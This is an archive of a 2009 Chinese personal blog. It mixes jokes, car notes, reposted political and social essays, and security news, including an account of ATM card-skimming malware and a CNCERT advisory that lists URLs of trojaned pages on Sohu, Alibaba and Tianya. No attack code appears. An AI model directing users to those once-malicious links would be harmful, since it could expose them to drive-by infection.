2009年9月29日星期二
2009年9月18日星期五
2009年9月17日星期四
关于在线业务监控系统的说明
前一阵儿,我给移动提过,移动网站的每次异常,我都知道。
在这之前,为了更好地做好移动的应急工作,我个人做了一套在线业务的监控系统,无需安装到服务器上面,系统和网络拓朴都不用改变,可以实现如下功能:
1、丰富的报警方式,2秒内响应。一级邮件,二级短信,三级电话。
2、无agent,不占用服务器资源
3、模拟普通客户的人工操作
4、识别挂马、网页篡改等攻击,有传统防篡改功能
5、记录数据,可统计系统稳定性、接通率、服务质量
6、简易结构与部署要求,无需改动现有系统和网络,可同时监控多达上万个目标
7、手机防火墙,晚上只接报警信息,ssh跳板
8、通用应用与数据监控,除网站外,其它在线业务系统如vpn、ftp、ssh、数据库异常等都可以监控
移动方面很感兴趣,想看看,当时我说是我个人为了干好工作开发的工具,不对外出售,运行在slackware下面,没有界面
基本情况就是这样。对移动系统没有任何影响,模拟人工操作,远程运行的这样一个监控系统,对做好移动的服务,也是很有帮助的。
2009年9月16日星期三
凌晨,睡不着,该是干点儿什么的时候了
2009年9月12日星期六
公交车上的趣事
公交车上那些猛事,看到最后保证你趴在地上笑…ZT
1. 地点:广州某路公交车,下班时间
一老妇和一年轻女子起口角,事由大概是年轻女子不让座,老妇继而发飙,骂年轻女子没家教,老妇摆起了长辈的口吻:
老:"你家没有老人吗?"
嫩:"我家老人有小车!要坐公车也不等上下班时间"
老:"我们贡献了社会大半辈子了,哪有你这样不体谅老人家的"
嫩:"我现在还在水深火热地贡献社会,上了10小时班站了10小时,哪有您这么不体谅后辈的,难道您无儿无孙?"
老:"没有我们建设社会,哪能让你们这代人舒舒服服地过?"
嫩:"现在没有我们这代人缴税,您哪来的免费公交卡?"
老人出绝招 :"我不管,我现在呼吸很困难,不舒服,你让我坐下来!"
此时已经有别人耐不住,让了老人坐了,老人不肯,誓死要让嫩女难堪
嫩女作最后反击:"行行行,您别下车,我帮您打120,免得您突然暴毙!我最讨厌你这种以老卖老的,插队挤上车的时候就演成龙,上了车就装演林黛玉!"
顿时道出全车心声。。。。。。。。。。。
2. 时间:早高峰
地点:北京地铁
体验人:我同事
经过:我同事很淡定的看报纸,然后听到不远处有个人说了一句"你别往里挤了,这么多人",然后过了一分半钟后,突然那个往里挤的人大喊:"你打我啊!打我啊!"众人无语。
又过了大概一分钟,那个人唱上了:"一个北京人啊,欺负一个陕北的残疾人啊……一个北京人啊,欺负一个陕北的残疾人啊……他要打死这个来自陕北的残疾人啊……"翻来覆去的唱,唱了好几站。参照陕北信天游的口音和唱腔。
终于有人忍无可忍了,一个女人说:"别唱了!烦不烦啊!"
那个人接着唱:"两个北京人啊,欺负一个陕北的残疾人啊……两个北京人啊,欺负一个陕北的残疾人啊……他们要打死这个来自陕北的残疾人啊……"
众人无语。
大概又几站后,那人一直唱个没完,车到站门开后,门口有个男声不大但是估计够狠的,说了一句:"下车。你下不下车?"
然后车门关上,终于安静了~~~~
3. 一个公交青年哥哥说话很奔放的,俺上班的时候坐过几次他的车,
有次人超级多,多到恨不得坐到车顶上了,还有个奶奶拼命挤~啊挤。
然后司机哥哥发话了:"��啊~莫国拼命咯,嗯囡嘎国一身老骨头挤散哒,我不晓得拼咧。"
全车orz…………
长沙话,"奶奶啊,不要这么拼命啦,你这一身老骨头挤散了,我不知道拼的。"
4. 某穿校服男生在讲手机
像是在和小女朋友吵架
一开始,公车上的人见怪不怪
直到男生大声对手机说道
"你不要哭了好不好!!都说了不会怀上的!!你都没有来那个!!怎么会怀上呢??!!!"
顿时,整个公车安静了下来= =
5. 一个很胖的女人上了公交车,找不到座位,只能拉着车上的拉环,不料司机一个急刹车,胖女人把拉环拉断了,并一下子扑到了司机面前,司机看着她和她手上的拉环,没好气的说:"集满三个,送司机签名照一张!"
6. 一日公交上突闻一女的叫骂声仔细一听原来是手机被偷了,本以为她骂一会就算了的没想到骂的话越来越难听把偷他手机人的七大姑八大姨祖宗十八代一并问候了车上其他人都皱起眉头这时车到站开门一男的(估计是小偷)下车后掏出一手机扔向那女的曰:手机还给你嘴巴太狠了~!
7. 我同学有次坐503,人多到连司机都被挤着了。后来售票员也下车帮忙把乘客推上车。一阵努力过后,司机门一关绝尘而去,乘客们但见一个人在后面疯狂追车,定睛一看,竟然是售票员...大家都喊司机,让他停车,但是人太多了,看得见售票员在追车的人都在后门附近,声音完全传不到司机那里去。直到又到了站,司机没有听到人报站,才发现把售票员拉下了。一开门那个售票员气喘吁吁地上车,劈头就给了司机一顿痛骂,因为她就那样奔了一站的路...
8. 有次坐45,人很多,上了一年约30岁的男的手里抽着烟,他一上车,司机就叫他把烟灭了,结果他直接把烟往投币箱里仍,可以想象,司机当时那个晕哦问他为啥把烟丢箱里,他说是你喊我把烟灭了的嘛,他把投币箱当烟灰缸了.全车人都笑翻了.
9. 前两天我还遇到一个bh女,真够bh了。
一男人不知道因为什么跟她吵架,骂了句:贱样,操死你!
那女的也就20来岁,文文静静的,竟然大吼一句:怕你?我一逼夹死你!!!
车上所有的人都开始憋笑,都不行了........
10. 我在起点乘车,在第二站上来一位四、五十岁的妇女,我在前排坐,她在我旁边做下来,然后小声自言自语说,倒霉,怎么又是这个司机开车。没想到让司机听见了,司机是个小伙子回过头就骂,没想到这位女士也不是省油的灯,嗓门特别高,说我坐这趟公交车几年了,你们这些司机我哪个不熟悉,你什么什么时候压了一个女孩的自行车,你还有什么什么时候和别的公交车抢道撞了哪里哪里的树,还有一次和**路公交车司机为了抢道打架。我冤枉你了吗?我冤枉你了吗??我冤枉你了吗???然后就不停的数落这个司机,没有一句脏话,但是句句很厉害,这个司机居然就不吭声了,郁闷的开车。全车的人想笑忍着不敢笑。最终的结局更可笑,司机大概一口气咽不下去,在拐弯的时候蹭到旁边的一辆私家车了,这下这位女士更得意了,我说的没错吧,没错吧。哈哈。
11. 我一女同学在公车上碰到一个人拿这个手机特大声地喊
"喂 对 艾 我那10万块钱你给我划过来了没有啊 。。。。。"
我那同学巨郁闷 特烦这种人 就拿出手机来
"喂 妈 怎么回事儿阿 我那50万生活费汇过来没有啊 阿刚汇完阿行 行 好的"
12. 深夜,一公交车最后一班后准备交车,司机回头看,还有一位白衣的女士,坐在最后一排。
司机继续开车,看看倒车镜,那女的没了,大惊~~赶忙急刹车,回头一看,又坐那里,司机心虚的又转过头继续开车,小心的又看看倒车镜,女人又没有了,巨惊赶忙又急刹车,回头一看,那女人又出现了。
司机面临崩溃,一身冷汗转过头继续开车。第三次司机又看看倒车镜,那女人又不见了,司机已经崩溃了,又是一个急刹车,但没有在转过头去,这时那个女人缓慢的走到了他的面前,头发凌乱,满脸是血,滴在他的脚上,司机身体已经僵硬了,不敢转过头去看她~那女人用很低沉的声音说:"老娘和你有仇啊老娘一蹲下绑鞋带,你就急刹车,一蹲下绑鞋带,你就急刹车
2009年8月31日星期一
ATM取款机的攻击
根据Trustwave的报告称,该恶意软件主要针对运行Windows XP的ATM自动取款机,在东欧国家的ATM自动取款机上已经发现了这种恶意软件。
该恶意软件可以记录银行卡磁条信息和个人识别码,犯罪分子利用这些信息可以克隆银行卡并提取现金。
Trustwave的报告显示,恶意软件对信用卡资料的收集使用的是加密的DES (数据加密标准)算法,可以通过ATM的收据打印机打印出来。
当犯罪分子将一个所谓的"触发卡"插入自动取款机时,被控制的恶意软件通过GUI(图形用户界面)显示。触发卡会打开一个小窗口,显示出10个命令选项,犯罪分子有10秒的时间使用ATM机的键盘从中选择一个命令。
据Trustwave的报告介绍,"恶意软件包含先进的管理功能,允许攻击者通过自定义用户界面完全控制被内置了恶意软件的ATM机 "。然后犯罪分子可以查看交易次数、打印银行卡数据、重启机器、甚至卸载恶意软件等。另一个菜单选项允许自动柜员机的现金盒吐出现金。
Trustwave已经收集了多个版本的恶意软件。该公司认为,他们分析的只是一个早期版本的恶意软件,后期的那些版本明显已经增加了更多的恶意功能。
该公司建议银行对他们的自动取款机进行扫描,以检查它们是否已经感染了恶意软件
黑客入侵T-Mobile美国 用户资料被窃取
目前从我们获得的T-Mobile美国的官方叙述来看,他们既不确认也不否认所发生一切。不过用户信息的保护以及系统的安全问题是继续解决的问题,如果用户的信息安全真的受到侵害,我们一定会尽快做出相关报道
2009年8月25日星期二
记录一下油耗
回来的时候,油耗很少超过6,基本在3.5-5之间
今天去南部山区,有一些较大坡度的上坡,发现油耗一下子达到了9个还多。使用4档时反而稍低,5档时,大多数时间为7个多,小部分时间处于9个多。
回来的时候,因为已经黑天,视线不好,没有注意油耗
在南部山区比较平的地方,来回都是5个左右
上述油耗观察,基本处于60时速左右
2009年8月18日星期二
2009.8的最新挂马
安全公告: CN-SA09-08
发布日期:2009年8月12日
事件类型:挂马
威胁评估: 中
事件描述:
8月11日,CNCERT监测发现搜狐、天涯社区、阿里巴巴等国内三家大型门户网站存在挂马页面。用户在没有做好系统防护的情况下访问相关页面,浏览器就会自动下载恶意代码在计算机上执行,这不仅可能造成用户敏感数据失窃,也有可能形成大规模僵尸网络,严重威胁互联网运行安全。截至8月12日12时,阿里巴巴、天涯社区网站的挂马页面仍然存在;搜狐网站的页面在11日下午清除后于12日上午再次被挂马。
鉴于上述网站用户访问量较大,CNCERT提醒互联网用户不要访问挂马页面,并安装好防护软件,做好系统加固。此外,CNCERT建议有关网站所属公司立即清除挂马页面,并加强自身运营的网站及业务系统的安全管理,以免对广大互联网用户安全造成严重威胁。
如果发现有类似事件发生,请向CNCERT举报,联系电话:01082990999,邮箱:cncert@cert.org.cn。
附:搜狐、天涯社区、阿里巴巴网站的挂马页面链接
http://digi.it.sohu.com/20070918/n252211346.shtml(搜狐数码频道)
http://liuxue.sohu.com/sgp/ (搜狐留学频道)
http://info.china.alibaba.com/news/detail/v5003013-d1000221193.html(阿里巴巴商业资讯频道)
http://cache.tianya.cn/publicforum/Content/music/1/123173.shtml(天涯社区音乐天地版面)。
注:8月13日上午9时,CNCERT监测到天涯社区挂马页面仍然存在,阿里巴巴、搜狐挂马页面已清除;经过CNCERT积极协调,天涯社区于13日下午15点30分清除挂马页面。
2009年8月16日星期日
上网不会翻翻墙,便称英雄也废然
vbs+tor+firefox+fireproxy扩展,autoproxy
ultravpn google之就可以了
推荐 JonDoPortable
tor+Privoxy
2009年8月15日星期六
一看人家就是坐在有空调的房间里办公啊
2009年8月9日星期日
从老罗博客上看到的消息:公盟被取缔
张耀杰
据许志永博士发来的电子邮件《苍天在上——公盟要被处罚142万多元》介绍,2009年7月14日,公盟接到北京市国家税务局和地方税务局同时送来的《税务行政处罚事项告知书》,拟于7月24日之前做出行政处罚,地税拟处罚30多万元,国税拟追缴18万多元所得税并处93万多元罚款,两项加起来一共是142万多元。作为公盟法定代表人的许志永,还有可能遭受七年的牢狱之灾。
由此看来,北京市海淀区人大代表许志永及公盟,注定是要被政府当局以非政治的手段加以政治性的消灭与扼杀的。为了帮助政府雪上加霜地摧残本国的民间公益组织,本人在这里对许志永及公盟进行公开举报:
2006年9月30日晚上,本人在理工大学交流中心与许志永、张星水、胡星斗、汪海洋等人一起吃饭时,许志永邀请在座各位给公盟网站写稿,说是每篇给稿费300元。当天晚上,有一辆北京市公安局的中型警车一直在外面跟踪看守张星水,车上一共有四名警察。这些警察肯定写有“张星水值班日记”之类的东西,可以查找出来充当权威证据。
2006年10月23日,本人写作的《国务院官员关注龙泉地案》在公盟网站发表,其中专门表扬了国务院法制局的官员对于浙江省龙泉市龙渊一村违法征地案的跟踪关注。到了2007年9月26日,龙泉市政府派出近千名全副武装的公安、特警、民兵、民工强行捣毁了龙渊一村200多亩基本成熟的稻田和蔬菜基地,并以扩建公路为由,强拆30多间民房,从而以事实证明所谓的国务院官员关注龙泉地案,其实是在排演一场官官相护、狼狈为奸的政治骗局。
尽管如此,300元的稿费,许志永及公盟还是应该兑现的,但是,迄今为止本人从来没有收到过。此后多次见到许志永,他也再没有提到这件事情。而且有几次他讲到参与维权活动时自己被毒打以及别人被毒打的悲惨遭遇与感人情景时,本人还情不自禁地想给他捐款,只是因为被中国艺术研究院无理解聘之后无钱养家,暖在口袋里的几十元钱实在拿不出手,所以只好既惭愧又敬佩地看着别的朋友慷慨解囊。
考虑到中央政府有两万多亿美元的外汇储备白送给美国、俄罗斯、朝鲜、古巴、非洲都不能够招人喜欢,只好烂在财政部的国库里面不断贬值;又考虑到给许志永及公盟捐款的都是心肠比较软的穷苦人;本人建议凡是给许志永及公盟捐过款的人,都尽快到公盟登记以索回自己的捐款,免得这些小钱被北京的地税局及国税局抢走之后,又被更高级别的贪官污吏以弘扬中华民族一夫多妻的传统美德或者以德治国的神圣名义拿去包养歌星明星以及公共情人。借用许志永的话说:“我是一个穷人,我们是一群穷人,你们不能从我们这里敲诈钱财,也夺不去我们执着的信念。我们没有愤怒,更没有仇恨,我们满怀慈悲,继续走自己的路。”
应该特别指出的是,许志永一边“苍天在上”地仰望星空,一边斥骂“一些没有良心的畜生们说三道四”,分明有替天行道的梁山好汉“反贪官不反皇帝”的欺软怕硬遗风,而与现代文明社会里法律面前人人平等,或者说是宪政民主的程序正义面前人人平等的普世性常识难以正常接轨。因为任何人的公共言行都应该经受住别人的“说三道四”,况且真正扼杀公盟的,并不是所谓“没有良心的畜生们”,反而是掌握着公共权力偏偏不作为或恶作为的反人性的国家机器。至少在把现代文明的普世常识转化成为以身作则的生活方式方面,许志永以后还需要继续向本人学习与看齐。
2009年7月16日于北京家中。
附:苍天在上——公盟要被处罚142万多元
许志永邮件授权说:“公盟被处罚请关注”
2009年7月14日,公盟接到北京市国家税务局和地方税务局同时送来的《税务行政处罚事项告知书》,拟于7月24日之前做出行政处罚,地税拟处罚30多万元,国税拟追缴18万多元所得税并处93万多元罚款,两项加起来一共是142万多元。
其中,地税的30万元处罚是针对耶鲁大学法学院自2006年以来的四笔资助以及公盟研究员王功权先生于2009年4月的资助,耶鲁大学的四笔资助我们于2009年5月已经交了税,功权的资助刚刚报给会计还没有来得及上税就被查了。国税的处罚同样是针对耶鲁大学法学院的合作项目,我们努力解释过,2007到2008年度的合作合同直到2009年初才确认完成,2008到2009年度的合作项目还没有完成,给我们的钱只能算是预付款,而且,公盟得到的捐助全部用于法律研究和弱势群体的法律援助等事项,没有任何剩余,哪里来18万多元的所得税并处93万多元的罚款?
公盟是一家公益组织,无奈注册成公司,我们一直在申请民政注册。我们认识到了管理确实不够规范,我们都不太懂工商税务,尽管我一再强调过我们的税务不能出现法律问题,但我们聘请的专业会计没有及时帮助我们。在税务稽查的时候,我们默默尽力配合,主动更正一些过错。但是,在丑陋的敌意面前,所有这一切努力都已经没有意义。我们已经缴纳的营业税还是被处罚,我们没有任何盈余还是被处罚所得税,而且,根据法律处罚额度在50%到5倍之间,税务部门没有任何理由一律按最重的5倍处罚。
142万的处罚,也许对很多企业而言都算不得什么,可是对于公盟而言,这是残忍而邪恶的,这不是对公盟的处罚,这是对毒奶粉受害的孩子、打工子弟学校的孩子、遭遇物业公司欺负的业主、为内心正义奔走呼号的上访者……是对千千万万最需要帮助的无权无势者的处罚,这处罚丧尽天良!
我们已经很谨慎了,考虑到一些没有良心的畜生们说三道四,我们拒绝接受一些基金会资助,我们选择了耶鲁大学法学院是因为他们也给一些政府部门资助,我了解他们,他们爱中国。公盟与耶鲁大学法学院的合作项目包括北京户籍制度改革研究,提出新移民准入制度的建议;就钉子户问题、西丰县委书记进京抓记者等问题召开研讨会;为小区业主维权呼吁;反对打工子弟学校强制拆迁;为河北承德五次被判处死刑的无辜公民、为被警方打死的杜学磊等一些列极端的冤案提供法律援助;提出司法改革建议;两会期间提出给人大代表的建议,等等。我们所有的努力都是理性的建设性的,我们怀着善良的愿望推动民主法治公平正义,我们从来都是这样怀着纯真的愿望。
合作项目的钱已经用完了。公盟是一个志愿者团队,我们所有的成员是凭内心的良知和正义感做事,除了很少的办公室专职人员外,我们大部分成员不拿工资,我们把所有的钱都用于良心和正义的事业,我们没有任何利润,从来也没有打算获得利润,我们的收获只是感动。现在如果税务部门要公盟补18万多元的所得税并作出93万多元的处罚,这巨额的罚款只能来自公盟现有的钱——素不相识的朋友们那100元、200元甚至5元、10元的捐助。
这是不可能的!作为公盟的法定代表人,我宁愿接受七年的刑事处罚,也绝不会把这些5元、10元的捐助交给丧尽天良的畜生们。说我许志永犯了偷税罪,就像临沂的警察指控我是小偷一样,可笑!
也许有人在背后恶狠狠地说,公盟有政治目的,我对这种说法报以同情。我们的政治目的很清楚,是为了这个国家民主法治公平正义,为了每一个人的自由和幸福,不仅为了我们具体帮助的个体,更是为了建立民主法治健全的制度,让所有的人,包括那些至今仍然对我们怀有敌意的同胞也能获得正义、自由和尊严。
有人说,公盟就是为社会制造麻烦。我仿佛看到了一张被仇恨和猥琐弄脏了的脸,说,终于逮到了,罚,给我狠狠地罚,只要沾一点边的都给我罚,让你们再给我制造麻烦!不是我们制造麻烦,一年数万起群体性事件不是我们制造的,杨佳不是我们制造的,相反,我们努力把贪官污吏制造的矛盾纳入法治轨道,我们倡导绝对的非暴力,希望我们的社会没完没了的仇恨和冲突能够用爱化解。我们不仅是为了那些遭遇邪恶不公正的受难者,也是为了高高在上的肉食者,我们对这个民族怀有深深的责任——不要让这个国家再出现动荡以至于权贵们死无葬身之地,不要让我们民族的悲剧重演。
为什么,为什么我们要遭到如此报应?因为我们一身浩然正气,因为我们倡导美好的政治,因为我们的愿望太美好了,因为我们对这个民族从没有放弃希望,因为无论遭遇什么我们内心从来充满希望的阳光。
我很荣幸再次成为小偷。第一次是在临沂,我被指控为小偷并被带到派出所,在没有辩护人的情况下我的朋友——一个从小双目失明为当地村民的尊严而奔走呼号的中国人以故意毁坏财物罪判处四年徒刑。这次是在北京,我偷税,哈——哈——哈——!我是一个穷人,穷的只剩下信仰了。大人,把我的美好的信仰贡献给您一点行吗?你们应该需要这种信仰,你们应该有能力像我一样心怀慈悲,慈悲地看着鬼魅魍魉们不安的灵魂。
我是一个穷人,我们是一群穷人,你们不能从我们这里敲诈钱财,也夺不去我们执着的信念。我们没有愤怒,更没有仇恨,我们满怀慈悲,继续走自己的路。公盟不会灭亡的,这个民族的良心和正义的希望不会灭亡的。
许志永2009年7月15日
2009年8月6日星期四
谁人不是冤大头?
(一)
四月初,我在小区门口的水果店买了两回西瓜。都不好吃。
第一次,2元/斤,没有切。给店小二留下话:不好的话,我要退的。
小二说:没问题。
收了钱,走人。拿回家,切开一看,瓜没怎么熟。吃了两口,实在太难吃,只好扔了。
我想:可能买早了。等等再说。
又过了两周左右,第二次,同一家。顺便跟店老大说上次买瓜的事。
店老大说:刚来的。不认得老主顾。那是本地瓜,还要等一阵。这有外地的。这个好。
又没有切。因为是外地货,变成了3元/斤。店主说:包你好吃。
回家切开。瓜看起来红红的,比上次好。
切好后,吆喝一家人来吃。勉强吃了一块。
咬下去的确有水,但实在没什么西瓜的味道,好像只是用水泡过一样。
再仔细看看西瓜的红色,青的和红的,颜色都不均匀。不知道这西瓜是泡过,还是打了催熟剂。
我不想浪费,勉强多吃了几口。实在太难吃了。
我知道自己又上当了。我提醒自己:下回买瓜的时候,一定得先剖开,尝一口再说。
不过,我肯定不会在这家买任何东西了。
(二)
转眼七月到了,西瓜也该熟了。有一天,家里来客人。自然就想到了买西瓜。
多走了几步,到隔壁的小区门口的水果店去买。
女店主热情地过来,给我推荐刚到的宁夏瓜。1.5元/斤。
我说:你这个不便宜。包熟?
女店主说:包熟!
立马选了个10多斤重的瓜放在案板上,用西瓜刀挑出一个三角形的口子。
我尝了一下:靠近瓜皮的地方,都是甜的。
高高兴兴地抱回家。一小会儿,风卷残云。
大家一致认为,这是今年吃的最好的一次瓜。
又买了一次,没有切口,还是好吃。我心中暗喜:这下不愁买不到好瓜了。
又隔了几天,去买。女店主给小妹说:把那个地方的瓜拿一个出来。
女店主给小妹说:你知道我说的是,那个地方,你知道吗?
小妹不耐烦地说:晓得。
小妹把瓜抱出来,12斤重。
我拎回家,切开,尝了一口,脸都绿了:瓜又是水浸过一样,有水无味。
我真想拍拍自己的头:你真的好瓜哦!下次记住,找20斤的瓜,剖开,尝一口,买半个!
我恍然大悟:女店主说的那个地方,到底是个什么意思。
妈妈说:你在哪儿买的啊?
我说:就在你平时买肉的隔壁。
妈妈说:明天我说说他们,太不象话了!
(三)
第二天,妈妈去讨公道了。结果,还没轮上。
一大早,门口已经围观了不少人。
有一个女士拎了头天买的瓜,扔在那家店的门口,要一个说法。
那瓜买回去,发现都馊了。
女店主说:我们的瓜,买主很多。这种事情从来就没有过。
妈妈先买肉,卖肉的大婶跟妈妈眨眼睛,悄悄说:今天都好几个来找她的了。
女士要求女店主赔,女店主不干。
女士只好打了110过来解决。警察来了,女店主只愿意赔5块钱。
女士咬牙切齿,她扔了一句:老子,总有机会收拾你们这些王八蛋。她骂骂咧咧地开车走了。
此时,男店主凶神恶煞地拎了西瓜刀,从屋里冲了出来。对着车子飞奔过去。路旁的人发出尖叫。
男人隔着玻璃,对着里面的女人吼叫:你他妈敢再来,老子捅死你!
西瓜刀在空中挥舞了一下,在阳光下,发出寒冷的光。
妈妈买了肉就回家了。她说:我再也不在这家买任何东西了。
(四)
我遇到的类似坑人的事情,还有一些。俗话说,吃一堑,长一智。如此经年,我已经长了很多智。
惹不起,躲得起。你敢坑我,我就不鸟你。不鸟一家是一家。
过去有一家文具店,我经常去,后来,我也不去了。我在他们那儿买了一张不能激活的电话卡,他们死不认帐;
还有,自从我亲眼目睹矿泉水厂家用自来水灌装矿泉水后,我们家就再也没有喝过桶装的矿泉水了。
那个在转角的曾经红火的送水处,如今也不知去向。
所以说,等到后来发生奶粉里加三聚氰胺的时候,我一点也不感到震惊了。
有一阵,我真还是有点想不通:为何这些多的聪明人这么急不可待,毫无道德良心地作恶?他们真的甘心辛苦几十年的基业,可以毁于一旦?
难道他们从来就没有想过这样做有报应吗?
我相信,从长远的角度来看,只有大脑稍微正常一点,都不会去做这样的事。
可是,就连买西瓜这种小事情都在告诫我,谁在乎长远呢?
小区周围的卖水果的店主,都是些近郊很有头脑的农民。他们租下小区外面的铺面,一是可以用来卖自己从远处拉过来的货物,二来可以自己住。这样既不给农贸市场交摊位费,也不会到处租房子住。既省钱离客户又近。
虽说是小生意,只要好好做下去,就可以做得又好,又持久。只要勤勉,就能稳稳当当地赚钱。
可惜的是,没有人会这样想。聪明的人都不会这样想。
在这样的一个时代里,每个造假者都有自己的理由:万一腐烂的存货没有被发现呢?万一发现了可以抵赖呢?万一自己老实,别人不老实呢?
如果自己不捞,别人也会捞。社会上那么多贪官污吏,那么多有权有势的人,偶们卖点假货养家糊口,能有多大的错?快点赚钱,能有多大的错?
凭什么不在报复来临之前,拼命捞上一把呢?
我赚够了钱,我就上岸了。我哪里需要考虑那么远呢?
所以,你要能够发财,不做点伤天害理的事情,你成功得都没有什么脾气。
有便宜不占王八蛋。
(五)
当然,有类似想法的,也不都是生意人。在一个潜规则盛行的国度,是每个行业的大多数人:
我是老师,你的娃儿总要读书。我总会让他们学奥数,上补习班。该收的补课费,任何损失也不会少;
我是医生,天下谁人不生病。上了医院,我就是大爷。一个感冒,收个千儿八百的,看我怎么收拾你;
还有谁敢坑我。我是官员。我吃完国家,吃银行,吃完银行吃股市。我出国玩、开公车、招白员。反正,花的又不是自个儿的钱;
我是做IT的。你们都不上网,我不怕。我可以开发网游,让你们的小孩都上瘾。我可以教给他们很多,你们不想要的东西:暴力、色情。我会从小孩那里掏空你们的钱,当然,还有你们的未来。而且,我可以放心地告诉所有指责网游的人:这又不是网游的错!
我是农民,我最倒霉。你们收了我们的地,升了你们的鸡的屁(GDP)。你们也别高兴得太早。给你们这些城里人吃喂过饲料的猪肉,吃死你们。
人不坑我,我也坑人。人若坑我,我必倍坑人。
人们相信,那些教科书里面说的,官方台面说的道德说辞,都不是真的。
真的东西,都藏在台下和幕后、、、
生活会一次一次的努力改变都失败了:一个潜规则的社会,是一个假定人人恶意、没有信仰的社会,很多的人敢于公然做恶,也从不相信有什么因果报应。
人们也习惯于穷凶极恶,与狼共舞。
然而,只要这个社会好人倒霉,恶人得势,没有人相信善有善报,恶有恶报,那么,谁人不是冤大头?
不论是一个商铺,一个产业,抑或一个社会,没有基本的是非曲直,没有基本的道德良心,没有基本的信任规则。哪里都只是丛林。到处都只有潜规则,哪里就只有完蛋的份。
一次一次的努力都会打了水漂,一次一次的崩溃是不可阻挡的。所有的未来都建立在砂砾之上。
出来混,迟早是要还的。
喷嚏网:原创 www.dapenti.com
转贴:谁人不是冤大头?
(一)
四月初,我在小区门口的水果店买了两回西瓜。都不好吃。
第一次,2元/斤,没有切。给店小二留下话:不好的话,我要退的。
小二说:没问题。
收了钱,走人。拿回家,切开一看,瓜没怎么熟。吃了两口,实在太难吃,只好扔了。
我想:可能买早了。等等再说。
又过了两周左右,第二次,同一家。顺便跟店老大说上次买瓜的事。
店老大说:刚来的。不认得老主顾。那是本地瓜,还要等一阵。这有外地的。这个好。
又没有切。因为是外地货,变成了3元/斤。店主说:包你好吃。
回家切开。瓜看起来红红的,比上次好。
切好后,吆喝一家人来吃。勉强吃了一块。
咬下去的确有水,但实在没什么西瓜的味道,好像只是用水泡过一样。
再仔细看看西瓜的红色,青的和红的,颜色都不均匀。不知道这西瓜是泡过,还是打了催熟剂。
我不想浪费,勉强多吃了几口。实在太难吃了。
我知道自己又上当了。我提醒自己:下回买瓜的时候,一定得先剖开,尝一口再说。
不过,我肯定不会在这家买任何东西了。
(二)
转眼七月到了,西瓜也该熟了。有一天,家里来客人。自然就想到了买西瓜。
多走了几步,到隔壁的小区门口的水果店去买。
女店主热情地过来,给我推荐刚到的宁夏瓜。1.5元/斤。
我说:你这个不便宜。包熟?
女店主说:包熟!
立马选了个10多斤重的瓜放在案板上,用西瓜刀挑出一个三角形的口子。
我尝了一下:靠近瓜皮的地方,都是甜的。
高高兴兴地抱回家。一小会儿,风卷残云。
大家一致认为,这是今年吃的最好的一次瓜。
又买了一次,没有切口,还是好吃。我心中暗喜:这下不愁买不到好瓜了。
又隔了几天,去买。女店主给小妹说:把那个地方的瓜拿一个出来。
女店主给小妹说:你知道我说的是,那个地方,你知道吗?
小妹不耐烦地说:晓得。
小妹把瓜抱出来,12斤重。
我拎回家,切开,尝了一口,脸都绿了:瓜又是水浸过一样,有水无味。
我真想拍拍自己的头:你真的好瓜哦!下次记住,找20斤的瓜,剖开,尝一口,买半个!
我恍然大悟:女店主说的那个地方,到底是个什么意思。
妈妈说:你在哪儿买的啊?
我说:就在你平时买肉的隔壁。
妈妈说:明天我说说他们,太不象话了!
(三)
第二天,妈妈去讨公道了。结果,还没轮上。
一大早,门口已经围观了不少人。
有一个女士拎了头天买的瓜,扔在那家店的门口,要一个说法。
那瓜买回去,发现都馊了。
女店主说:我们的瓜,买主很多。这种事情从来就没有过。
妈妈先买肉,卖肉的大婶跟妈妈眨眼睛,悄悄说:今天都好几个来找她的了。
女士要求女店主赔,女店主不干。
女士只好打了110过来解决。警察来了,女店主只愿意赔5块钱。
女士咬牙切齿,她扔了一句:老子,总有机会收拾你们这些王八蛋。她骂骂咧咧地开车走了。
此时,男店主凶神恶煞地拎了西瓜刀,从屋里冲了出来。对着车子飞奔过去。路旁的人发出尖叫。
男人隔着玻璃,对着里面的女人吼叫:你他妈敢再来,老子捅死你!
西瓜刀在空中挥舞了一下,在阳光下,发出寒冷的光。
妈妈买了肉就回家了。她说:我再也不在这家买任何东西了。
(四)
我遇到的类似坑人的事情,还有一些。俗话说,吃一堑,长一智。如此经年,我已经长了很多智。
惹不起,躲得起。你敢坑我,我就不鸟你。不鸟一家是一家。
过去有一家文具店,我经常去,后来,我也不去了。我在他们那儿买了一张不能激活的电话卡,他们死不认帐;
还有,自从我亲眼目睹矿泉水厂家用自来水灌装矿泉水后,我们家就再也没有喝过桶装的矿泉水了。
那个在转角的曾经红火的送水处,如今也不知去向。
所以说,等到后来发生奶粉里加三聚氰胺的时候,我一点也不感到震惊了。
有一阵,我真还是有点想不通:为何这些多的聪明人这么急不可待,毫无道德良心地作恶?他们真的甘心辛苦几十年的基业,可以毁于一旦?
难道他们从来就没有想过这样做有报应吗?
我相信,从长远的角度来看,只有大脑稍微正常一点,都不会去做这样的事。
可是,就连买西瓜这种小事情都在告诫我,谁在乎长远呢?
小区周围的卖水果的店主,都是些近郊很有头脑的农民。他们租下小区外面的铺面,一是可以用来卖自己从远处拉过来的货物,二来可以自己住。这样既不给农贸市场交摊位费,也不会到处租房子住。既省钱离客户又近。
虽说是小生意,只要好好做下去,就可以做得又好,又持久。只要勤勉,就能稳稳当当地赚钱。
可惜的是,没有人会这样想。聪明的人都不会这样想。
在这样的一个时代里,每个造假者都有自己的理由:万一腐烂的存货没有被发现呢?万一发现了可以抵赖呢?万一自己老实,别人不老实呢?
如果自己不捞,别人也会捞。社会上那么多贪官污吏,那么多有权有势的人,偶们卖点假货养家糊口,能有多大的错?快点赚钱,能有多大的错?
凭什么不在报复来临之前,拼命捞上一把呢?
我赚够了钱,我就上岸了。我哪里需要考虑那么远呢?
所以,你要能够发财,不做点伤天害理的事情,你成功得都没有什么脾气。
有便宜不占王八蛋。
(五)
当然,有类似想法的,也不都是生意人。在一个潜规则盛行的国度,是每个行业的大多数人:
我是老师,你的娃儿总要读书。我总会让他们学奥数,上补习班。该收的补课费,任何损失也不会少;
我是医生,天下谁人不生病。上了医院,我就是大爷。一个感冒,收个千儿八百的,看我怎么收拾你;
还有谁敢坑我。我是官员。我吃完国家,吃银行,吃完银行吃股市。我出国玩、开公车、招白员。反正,花的又不是自个儿的钱;
我是做IT的。你们都不上网,我不怕。我可以开发网游,让你们的小孩都上瘾。我可以教给他们很多,你们不想要的东西:暴力、色情。我会从小孩那里掏空你们的钱,当然,还有你们的未来。而且,我可以放心地告诉所有指责网游的人:这又不是网游的错!
